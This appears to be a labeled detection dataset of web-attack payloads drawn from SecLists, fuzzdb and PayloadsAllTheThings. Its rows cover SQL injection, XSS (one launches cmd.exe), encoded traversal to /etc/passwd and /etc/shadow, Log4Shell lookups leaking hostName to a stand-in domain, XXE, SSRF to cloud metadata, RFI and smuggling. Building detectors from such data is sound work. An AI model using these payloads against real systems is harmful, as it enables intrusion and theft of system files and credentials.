artemtarasov
fd45587f85cb303b | /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(1,user()),1) | SQLi | 66 - SQL Injection|310 - Scanning for Vulnerable Software | malicious | plain | t | SR-BH 2020 |
1be31cfcb09cec3d | /?p4yl04d2=1 UNION ALL SELECT 1,2,3,table_name FROM information_schema.tables | SQLi | 66 - SQL Injection|310 - Scanning for Vulnerable Software | malicious | plain | t | SR-BH 2020 |
1eb9536a9459577f | /wp-content/plugins/all-in-one-seo-pack/ | SQLi | 66 - SQL Injection|310 - Scanning for Vulnerable Software | malicious | plain | t | SR-BH 2020 |
c71b033af52a4e28 | /wp-content/plugins/all-in-one-wp-security-and-firewall/ | SQLi | 66 - SQL Injection|310 - Scanning for Vulnerable Software | malicious | plain | t | SR-BH 2020 |
64bb436b02a85e51 | /wp-content/plugins/all-in-one-wp-migration/ | SQLi | 66 - SQL Injection|310 - Scanning for Vulnerable Software | malicious | plain | t | SR-BH 2020 |
12cdbdff5aec71b6 | /blog/%2F%7B%7B+data.image.src/my-account/edit-profile/{{ data.image.src | SQLi | 66 - SQL Injection | malicious | url | t | SR-BH 2020 |
49ca0cfb16c2ef9d | /blog/index.php/my-account/%2Fetc%2Fpasswd/{{ data.icon }} | SQLi | 66 - SQL Injection | malicious | url | t | SR-BH 2020 |
5a165cd0ea7426f0 | /blog/%7B%7B+attachment.thumbnail.url/my-account/edit-profile/{{ attachment.thumbnail.url | SQLi | 66 - SQL Injection | malicious | url | t | SR-BH 2020 |
9301fb3f8bfbc8bb | /etc%2Fpasswd/index.php/my-account/edit-profile/{{ attachment.thumbnail.url }} | SQLi | 66 - SQL Injection | malicious | url | t | SR-BH 2020 |
0691aa128bfd9a6a | /c%3A%2F/index.php/my-account/edit-profile/{{ attachment.thumbnail.url }} | SQLi | 66 - SQL Injection | malicious | url | t | SR-BH 2020 |
2226b4bb8787d39a | /%2F/index.php/my-account/edit-profile/{{ attachment.thumbnail.url }} | SQLi | 66 - SQL Injection | malicious | url | t | SR-BH 2020 |
34c6d863634a3449 | /c%3A%5C/index.php/my-account/edit-profile/{{ attachment.thumbnail.url }} | SQLi | 66 - SQL Injection | malicious | url | t | SR-BH 2020 |
e97bee688936eece | /%7B%7B+attachment.thumbnail.url+%7D%7D/index.php/my-account/edit-profile/{{ attachment.thumbnail.url }} | SQLi | 66 - SQL Injection | malicious | url | t | SR-BH 2020 |
48e544955e8767d2 | /%2F%7B%7B+attachment.thumbnail.url+%7D%7D/index.php/my-account/edit-profile/{{ attachment.thumbnail.url }} | SQLi | 66 - SQL Injection | malicious | url | t | SR-BH 2020 |
57c866f91d1747e9 | /%5C%7B%7B+attachment.thumbnail.url+%7D%7D/index.php/my-account/edit-profile/{{ attachment.thumbnail.url }} | SQLi | 66 - SQL Injection | malicious | url | t | SR-BH 2020 |
a775d95f70e77c60 | /blog/%2Fetc%2Fpasswd/my-account/edit-profile/{{ attachment.thumbnail.url }} | SQLi | 66 - SQL Injection | malicious | url | t | SR-BH 2020 |
b628117ce99eb2c4 | /blog/etc%2Fpasswd/my-account/edit-profile/{{ attachment.thumbnail.url }} | SQLi | 66 - SQL Injection | malicious | url | t | SR-BH 2020 |
62bffe20a94713e6 | /blog/c%3A%2F/my-account/edit-profile/{{ attachment.thumbnail.url }} | SQLi | 66 - SQL Injection | malicious | url | t | SR-BH 2020 |
bd758a0b10ae34e4 | /blog/%2F/my-account/edit-profile/{{ attachment.thumbnail.url }} | SQLi | 66 - SQL Injection | malicious | url | t | SR-BH 2020 |
ff526ecb2df7d3d4 | /blog/c%3A%5C/my-account/edit-profile/{{ attachment.thumbnail.url }} | SQLi | 66 - SQL Injection | malicious | url | t | SR-BH 2020 |
077cc1cffa85e4c5 | /blog/%7B%7B+attachment.thumbnail.url+%7D%7D/my-account/edit-profile/{{ attachment.thumbnail.url }} | SQLi | 66 - SQL Injection | malicious | url | t | SR-BH 2020 |
c44d03500b061a21 | /blog/%2F%7B%7B+attachment.thumbnail.url+%7D%7D/my-account/edit-profile/{{ attachment.thumbnail.url }} | SQLi | 66 - SQL Injection | malicious | url | t | SR-BH 2020 |
26f2aef0e0aa0aff | /c:\/index.php/my-account/edit-profile/post.php?action=edit&post={{ data.id }} | SQLi | 66 - SQL Injection | malicious | plain | t | SR-BH 2020 |
c716e2ffbe8cde61 | /blog/%5C%7B%7B+attachment.thumbnail.url+%7D%7D/my-account/edit-profile/{{ attachment.thumbnail.url }} | SQLi | 66 - SQL Injection | malicious | url | t | SR-BH 2020 |
78d1a04584cee927 | /blog/index.php/%2Fetc%2Fpasswd/edit-profile/{{ attachment.thumbnail.url }} | SQLi | 66 - SQL Injection | malicious | url | t | SR-BH 2020 |
02b60617b020990b | aim: &c:\windows\system32\calc.exe" ini="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\pwnd.bat" | XSS | malicious | plain | f | SecLists|fuzzdb | |
52f9f9c045fcbc51 | firefoxurl:test|"%20-new-window%20javascript:alert(\'Cross%2520Browser%2520Scripting!\');" | XSS | malicious | url | f | SecLists|fuzzdb | |
90e8d28d2dc1f7d4 | navigatorurl:test" -chrome "javascript:C=Components.classes;I=Components.interfaces;file=C[\'@mozilla.org/file/local;1\'].createInstance(I.nsILocalFile);file.initWithPath(\'C:\'+String.fromCharCode(92)+String.fromCharCode(92)+\'Windows\'+String.fromCharCode(92)+String.fromCharCode(92)+\'System32\'+String.fromCharCode(92)+String.fromCharCode(92)+\'cmd.exe\');process=C[\'@mozilla.org/process/util;1\'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process) | XSS | malicious | url | f | SecLists|fuzzdb | |
c81fabdad0de98ba | res://c:\\program%20files\\adobe\\acrobat%207.0\\acrobat\\acrobat.dll/#2/#210 | XSS | malicious | url | f | SecLists|fuzzdb | |
56de62f1d743e4c3 | <a draggable="true" ondrag="alert(1)">test</a> | XSS | malicious | plain | f | SecLists|mgm-web-attack-payloads|xss-payloads | |
bb24e6cda9654353 | <a draggable="true" ondragend="alert(1)">test</a> | XSS | malicious | plain | f | SecLists|mgm-web-attack-payloads|xss-payloads | |
3dd81e38705c962a | <a draggable="true" ondragenter="alert(1)">test</a> | XSS | malicious | plain | f | SecLists|mgm-web-attack-payloads|xss-payloads | |
13d7c00011de6691 | <a draggable="true" ondragleave="alert(1)">test</a> | XSS | malicious | plain | f | SecLists|mgm-web-attack-payloads|xss-payloads | |
834a0f8ad7412350 | <a draggable="true" ondragstart="alert(1)">test</a> | XSS | malicious | plain | f | SecLists|mgm-web-attack-payloads|xss-payloads | |
880cccf66d624c5b | <a id=x tabindex=1 onactivate=alert(1)></a> | XSS | malicious | plain | f | SecLists|mgm-web-attack-payloads|xss-payloads | |
f92b606718b6db9e | <a id=x tabindex=1 onbeforeactivate=alert(1)></a> | XSS | malicious | plain | f | SecLists|mgm-web-attack-payloads|xss-payloads | |
e5d635d75a8dc112 | <a id=x tabindex=1 onbeforedeactivate=alert(1)></a><input autofocus> | XSS | malicious | plain | f | SecLists|mgm-web-attack-payloads|xss-payloads | |
0f98058423920f97 | <a id=x tabindex=1 ondeactivate=alert(1)></a><input id=y autofocus> | XSS | malicious | plain | f | SecLists|mgm-web-attack-payloads|xss-payloads | |
7f4d18946a03c370 | <a id=x tabindex=1 onfocus=alert(1)></a> | XSS | malicious | plain | f | SecLists|mgm-web-attack-payloads|xss-payloads | |
19b7486a186d90e6 | <a id=x tabindex=1 onfocusin=alert(1)></a> | XSS | malicious | plain | f | SecLists|mgm-web-attack-payloads|xss-payloads | |
3c4a948ebce3a4c7 | <a onbeforecopy="alert(1)" contenteditable>test</a> | XSS | malicious | plain | f | SecLists|mgm-web-attack-payloads|xss-payloads | |
8f1eebc90f7c053c | <a onbeforecut="alert(1)" contenteditable>test</a> | XSS | malicious | plain | f | SecLists|mgm-web-attack-payloads|xss-payloads | |
1cc88e598afe7734 | <a onbeforepaste="alert(1)" contenteditable>test</a> | XSS | malicious | plain | f | SecLists|mgm-web-attack-payloads|xss-payloads | |
3b85728b3325ace5 | echo%20AGIYMZ$((69%2B52))$(echo%20AGIYMZ)AGIYMZ | Command Injection | malicious | url | f | SecLists | |
00edd8bfd49af82a | %20echo%20TDJHRY$((30%2B41))$(echo%20TDJHRY)TDJHRY | Command Injection | malicious | url | f | SecLists | |
7e911d4ef8f40591 | ;echo%20MPCSBG$((54%2B42))$(echo%20MPCSBG)MPCSBG | Command Injection | malicious | url | f | SecLists | |
c4a1f3e67d4719f4 | &echo%20NWMZCF$((57%2B72))$(echo%20NWMZCF)NWMZCF | Command Injection | malicious | url | f | SecLists | |
994da29bdd24c055 | |echo%20TJEGSE$((27%2B57))$(echo%20TJEGSE)TJEGSE | Command Injection | malicious | url | f | SecLists | |
732a2c6ec7de3538 | ||echo%20ANSBHE$((26%2B89))$(echo%20ANSBHE)ANSBHE | Command Injection | malicious | url | f | SecLists | |
826fc52691e7cf9e | &&echo%20PVJXOS$((12%2B1))$(echo%20PVJXOS)PVJXOS | Command Injection | malicious | url | f | SecLists | |
f00d6dc555e58412 | %0aecho%20VVIEOJ$((30%2B78))$(echo%20VVIEOJ)VVIEOJ | Command Injection | malicious | url | f | SecLists | |
eb8afbd34b298246 | %3Becho%20SRPJET$((29%2B34))$(echo%20SRPJET)SRPJET | Command Injection | malicious | url | f | SecLists | |
78a18f9fbbcda966 | %26echo%20NQPWBV$((16%2B77))$(echo%20NQPWBV)NQPWBV | Command Injection | malicious | url | f | SecLists | |
8ec40a5593368160 | %26%26echo%20QOZRFB$((19%2B4))$(echo%20QOZRFB)QOZRFB | Command Injection | malicious | url | f | SecLists | |
3bc5873f7a53d4dd | %7Cecho%20IRODNG$((26%2B68))$(echo%20IRODNG)IRODNG | Command Injection | malicious | url | f | SecLists | |
364819b03260a32b | \web.config | Path Traversal | malicious | plain | f | SecLists | |
d5b9cf9bd213486c | ../web.config | Path Traversal | malicious | plain | f | SecLists | |
4926ebebee57ba22 | \…..\\\…..\\\…..\\\ | Path Traversal | malicious | plain | f | PayloadsAllTheThings|SecLists|fuzzdb | |
646a1d30c64e063a | %00/etc/shadow%00 | Path Traversal | malicious | url | f | PayloadsAllTheThings|SecLists|fuzzdb | |
199caa0ef1828b82 | %0a/bin/cat%20/etc/passwd | Path Traversal | malicious | url | f | PayloadsAllTheThings|SecLists|fuzzdb | |
e529d010653f9aae | %0a/bin/cat%20/etc/shadow | Path Traversal | malicious | url | f | PayloadsAllTheThings|SecLists|fuzzdb | |
ffc523d46b92719e | %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%00 | Path Traversal | malicious | url | f | PayloadsAllTheThings|SecLists|fuzzdb | |
f5a5657ce19170c8 | %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%255cboot.ini | Path Traversal | malicious | url | f | PayloadsAllTheThings|SecLists|fuzzdb | |
efc89282327c91a2 | %252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd | Path Traversal | malicious | url | f | SecLists | |
b81f010a98d8786f | %252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/shadow | Path Traversal | malicious | url | f | SecLists | |
b9de559652e625b7 | ..\web.config | Path Traversal | malicious | plain | f | SecLists | |
5b281f6d5fa26878 | ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd | Path Traversal | malicious | url | f | PayloadsAllTheThings|SecLists|fuzzdb | |
717d47f39873b4ec | ${jndi:dns:/${hostName}.fake.domain} | Log4Shell | malicious | plain | f | mgm-web-attack-payloads | |
d94c4c0a42bb4015 | ${${::-${::-$${::-j}}}} | Log4Shell | malicious | plain | f | mgm-web-attack-payloads | |
b0e089c1ab1bf2a4 | ${${date:'j'}${date:'n'}${date:'d'}${date:'i'}:${date:'l'}${date:'d'}${date:'a'}${date:'p'}://fake.domain/z} | Log4Shell | malicious | plain | f | mgm-web-attack-payloads | |
093350421d71a5ea | ${${date:'j'}${date:'n'}${date:'d'}${date:'i'}:${date:'l'}${date:'d'}${date:'a'}${date:'p'}:/fake.domain/z} | Log4Shell | malicious | plain | f | mgm-web-attack-payloads | |
235b194ecc458842 | ${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//chxpdum2js1nqtxmwlrd.fake.domain/a} | Log4Shell | malicious | plain | f | mgm-web-attack-payloads | |
b4bb97d1fb157553 | ${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//fake.domain:1389/piesdsdn3m} | Log4Shell | malicious | plain | f | mgm-web-attack-payloads | |
29ed7e1831b06ec1 | ${7*'7'} | SSTI | malicious | plain | f | payload-box | |
af98a1c7b5c030a4 | {{_self.env.getCharset()}} | SSTI | malicious | plain | f | payload-box | |
e774eab5b23d6d04 | {{_self.env.isDebug()}} | SSTI | malicious | plain | f | payload-box | |
68850dfb56d9392f | {{_self.env.isAutoReload()}} | SSTI | malicious | plain | f | payload-box | |
828b41f1ac13a50c | {{_self.env.isStrictVariables()}} | SSTI | malicious | plain | f | payload-box | |
cff477bc61ca8e29 | {{app.request}} | SSTI | malicious | plain | f | payload-box | |
69b533090933a5ed | <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "http://127.0.0.1:22" >]><foo>&xxe;</foo> | SSRF | malicious | plain | f | payload-box | |
bf360094875fa1eb | <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "http://127.0.0.1:80" >]><foo>&xxe;</foo> | SSRF | malicious | plain | f | payload-box | |
a2f100d5fac11c4d | <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "http://localhost:80" >]><foo>&xxe;</foo> | SSRF | malicious | plain | f | payload-box | |
a6403d3de3dc1e39 | <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/" >]><foo>&xxe;</foo> | SSRF | malicious | plain | f | payload-box | |
b5788a0462a12594 | <!ENTITY % xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd" > | XXE | malicious | plain | f | SecLists | |
b12a0007c11d4aa7 | <?xml version="1.0" encoding="ISO-8859-1"?> | XXE | malicious | plain | f | PayloadsAllTheThings|SecLists | |
17752f8b553c9d16 | <!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]> | XXE | malicious | plain | f | PayloadsAllTheThings|SecLists | |
d4691c1d243424d9 | <!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]><root>&foo;</root> | XXE | malicious | plain | f | PayloadsAllTheThings|SecLists | |
1b1b6d2b22b1177c | /0_admin/modules/Wochenkarte/frontend/index.php?x_admindir=XXpathXX? | RFI | malicious | plain | f | fuzzdb | |
fec80fe434db0517 | /123flashchat.php?e107path=XXpathXX | RFI | malicious | plain | f | fuzzdb | |
68f00264cf7896a0 | /2007/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=XXpathXX | RFI | malicious | plain | f | fuzzdb | |
614b10532c30d349 | /22_ultimate/templates/header.php?mainpath=XXpathXX | RFI | malicious | plain | f | fuzzdb | |
2e66d75b9ef37249 | %2A%28%7C%28mail%3D%2A%29%29 | LDAP Injection | malicious | url | f | SecLists|fuzzdb | |
d30de49fdc901fbb | %2A%28%7C%28objectclass%3D%2A%29%29 | LDAP Injection | malicious | url | f | SecLists|fuzzdb | |
3378b00fff3850ed | %2A%7C | LDAP Injection | malicious | url | f | SecLists|fuzzdb | |
338aa1d52d6a2dec | ///example.com/%2f.. | Open Redirect | malicious | url | f | PayloadsAllTheThings | |
3e54e6f5ff803711 | /////example.com/ | Open Redirect | malicious | plain | f | PayloadsAllTheThings | |
a0bffc02392be538 | /////example.com | Open Redirect | malicious | plain | f | PayloadsAllTheThings | |
33480ca7f53c051e | Transfer-Encoding: chunked | HTTP Smuggling | malicious | plain | f | payload-box | |
18227a8a31fb4e8a | GET /test HTTP/1.1 | HTTP Smuggling | malicious | plain | f | payload-box | |
c03f9f70515c35ba | : chunked | HTTP Smuggling | malicious | plain | f | payload-box |